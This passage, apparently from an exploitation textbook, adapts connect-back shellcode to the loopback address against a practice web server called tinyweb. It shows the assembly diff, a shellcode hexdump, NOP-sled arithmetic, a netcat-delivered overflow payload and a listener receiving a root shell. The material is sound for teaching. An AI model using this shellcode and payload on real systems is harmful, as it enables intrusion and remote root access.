Graphics Programs Reference
In-Depth Information
multiple instructions. One way to do this is to write the two null bytes to
the stack using a zeroed register. The file loopback_shell.s is a modified
version of connectback_shell.s that uses the loopback address of 127.0.0.1.
The differences are shown in the following output.
reader@hacking:~/booksrc $ diff connectback_shell.s loopback_shell.s
21c21,22
< push DWORD 0x482aa8c0 ; Build sockaddr struct: IP Address = 192.168.42.72
---
> push DWORD 0x01BBBB7f ; Build sockaddr struct: IP Address = 127.0.0.1
> mov WORD [esp+1], dx ; overwrite the BBBB with 0000 in the previous push
r
eader@hacking:~/booksrc $
After pushing the value
0x01BBBB7f
to the stack, the ESP register will point
to the beginning of this DWORD. By writing a two-byte WORD of null bytes
at ESP+1, the middle two bytes will be overwritten to form the correct return
address.
This additional instruction increases the size of the shellcode by a few
bytes, which means the NOP sled also needs to be adjusted for the exploit
buffer. These calculations are shown in the output below, and they result in
a 397-byte NOP sled. This exploit using the loopback shellcode assumes that
the tinyweb program is running and that a netcat process is listening for
incoming connections on port 31337.
reader@hacking:~/booksrc $ nasm loopback_shell.s
reader@hacking:~/booksrc $ hexdump -C loopback_shell | grep --color=auto 00
00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|
00000010 96 6a 66 58 43 68 7f bb bb 01 66 89 54 24 01 66 |.jfXCh....f.T$.f|
00000020 68 7a 69 66 53 89 e1 6a 10 51 56 89 e1 43 cd 80 |hzifS..j.QV..C..|
00000030 87 f3 87 ce 49 b0 3f cd 80 49 79 f9 b0 0b 52 68 |....I.?..Iy...Rh|
00000040 2f 2f 73 68 68 2f 62 69 6e 89 e3 52 89 e2 53 89 |//shh/bin..R..S.|
00000050 e1 cd 80 |...|
00000053
reader@hacking:~/booksrc $ wc -c loopback_shell
83 loopback_shell
reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 83 ))
397
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x397';cat loopback_shell;perl -e 'print "\x88\
xf6\xff\xbf"x16 . "\r\n"') | nc -v 127.0.0.1 80
l
ocalhost [127.0.0.1] 80 (www) open
As with the previous exploit, the terminal with netcat listening on
port 31337 will receive the rootshell.
reader@hacking:~ $ nc -vlp 31337
listening on [any] 31337 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 42406
whoami
r
oot
It almost seems too easy, doesn't it?
